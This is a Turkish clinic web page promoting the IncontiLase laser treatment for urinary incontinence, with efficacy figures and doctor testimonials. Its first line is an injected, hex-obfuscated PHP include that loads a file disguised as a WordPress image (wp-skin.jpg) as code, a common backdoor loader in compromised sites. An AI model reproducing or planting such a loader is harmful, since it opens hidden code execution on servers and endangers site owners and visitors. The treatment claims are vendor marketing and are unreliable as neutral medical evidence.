@include(pack('H*', '77702d696e636c756465732f696d616765732f77702d736b696e2e6a7067')); LAZERLE VAJİNAL TEDAVİ VE ESTETİK - İnkontinanas
tedaviler_idrar_kacirma

İdrar Kaçırma

İnkoninans istemsiz olarak idrar kaçırma durumunu ifade eder. İnkontinans -mesane kontrolünü kaybetme- kadınlarda erkeklere oranla 3-4 kat daha fazla görülen bir problemdir. Stres inkontinans genellikle pelvik taban kasları ve üretral sfinkter gibi idrarın çıkmasını önlemek amacıyla kullanılan kasların zayıflamasının veya hasar görmesinin bir sonucudur. Karın iç basıncını arttıran; gülmek, hapşırmak ve öksürmek gibi aktiviteler esnasında istemsiz idrar kaybı oluşur.

Stres inkontinans, en sık görülen idrar kaçırma türüdür. Mesaneyi destekleyen pelvik taban kaslarının zayıflaması sonucu stes tipi inkontinans görülmektedir. Pelvik taban kasları alt idrar yolu organlarını desteklemektedir. Güldüğümüz ya da öksürdüğümüz sırada mesane üzerindeki basınç artar ve pelvik taban kasları artık idrarı içeride tutacak derecede mesaneyi sıkamaz. Stres inkontinans herhangi bir yaşta görülebilir. Her 4 kadından 1’i hayatlarının herhangi bir döneminde stres inkontinans yaşar. İnkontinans kişide hamilelik, doğum, obezite, yaşlılık ya da genetik sebeplerle görülebilir.

 

IncontiLase®nasıl çalışır?

IncontiLase, inkontinans için uygulanan yenilikçi, patentli, non-invaziv Er:YAG tedavisidir.

 • Fotona’nıntescilli SMOOTH™modteknolojisi ile 2.94 µm non-ablatif Er:YAGlaser.
 • Vajinal duvardaki fototermal güçlenme ile üretral desteği artırır.
 • Özellikle vajen ön duvarında olmak üzere vajinal mukozadaki bağ dokusu üzerinde çalışır.

 

Hafif idrar kaçırma problemi olan hastaların %90’ı ve orta dereceli idrar kaçırma hastalarının %76’sı sadece tek bir IncontiLase tedavisine ihtiyaç duymuştur. Fotona IncontiLase ile idrar kaçırma tedavileri, anestezi kullanımına ihtiyaç duyulmadan, kesisiz ve non-invaziv olarak gerçekleştirilir.  Tedavi süresi 20-30 dakikadır. Hastanın işlem sonrasında istirahate ihtiyacı yoktur.

Doktora Sorun

* alanları doldurmanız zorunludur
 • dr2
  "Non-invaziv olmasının yanı sıra, IncontiLase’in temel avantajı ayakta tedavi prosedürüyle uygulanabilmesidir. Bu da hastalardaki ekonomik yükü azaltıyor."
  Dr. Urska Bizjak Ogrinc
 • dr1
  IncontiLasetedavisini takip eden bir yıl içinde SUI tanısı koyulan hastaların %77’sinde iyileşme görüldü.
  Dr. Sabina Sencar